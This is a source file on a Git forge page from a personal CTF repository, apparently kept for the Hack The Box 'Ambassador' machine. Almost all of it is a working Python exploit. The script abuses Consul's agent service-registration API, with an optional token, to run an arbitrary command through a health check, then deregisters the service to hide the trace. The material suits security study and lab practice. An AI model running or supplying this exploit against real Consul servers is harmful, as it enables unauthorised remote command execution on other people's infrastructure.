simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
c42b50e6fd8e30ff31e84016dec1c85356bf455c
CTF/HTB/ambassador/consul_rce.py
Simon 82b0759f1e init htb 
old htb folders
2023-08-29 21:53:22 +02:00

66 lines
2.1 KiB
Python
Raw Blame History

'''
- Author: @owalid
- Description: This script exploits a command injection vulnerability in Consul
'''
import requests
import argparse
import time
import random
import string
def get_random_string():
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(15))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-th", "--target_host", help="Target Host (REQUIRED)", type=str, required=True)
parser.add_argument("-tp", "--target_port", help="Target Port (REQUIRED)", type=str, required=True)
parser.add_argument("-c", "--command", help="Command to execute (REQUIRED)", type=str, required=True)
parser.add_argument("-s", "--ssl", help="SSL", type=bool, required=False, default=False)
parser.add_argument("-ct", "--consul-token", help="Consul Token", type=str, required=False)
args = parser.parse_args()
protocol = "https" if args.ssl else "http"
url = f"{protocol}://{args.target_host}:{args.target_port}"
consul_token = args.consul_token
command = args.command
headers = {'X-Consul-Token': consul_token} if consul_token else {}
command_list = command.split(" ")
id = get_random_string()
data = {
'ID': id,
'Name': 'pwn',
'Address': '127.0.0.1',
'Port': 80,
"Check": {
"DeregisterCriticalServiceAfter": "90m",
"Args": command_list,
'Interval': '10s',
"Timeout": "86400s",
}
}
registerurl= f"{url}/v1/agent/service/register?replace-existing-checks=true"
r = requests.put(registerurl, json=data, headers=headers, verify=False)
if r.status_code != 200:
print(f"[-] Error creating check {id}")
print(r.text)
exit(1)
print(f"[+] Check {id} created successfully")
time.sleep(12)
desregisterurl = f"{url}/v1/agent/service/deregister/{id}"
r = requests.put(desregisterurl, headers=headers, verify=False)
if r.status_code != 200:
print(f"[-] Error deregistering check {id}")
print(r.text)
exit(1)
print(f"[+] Check {id} deregistered successfully")
Reference in New Issue View Git Blame Copy Permalink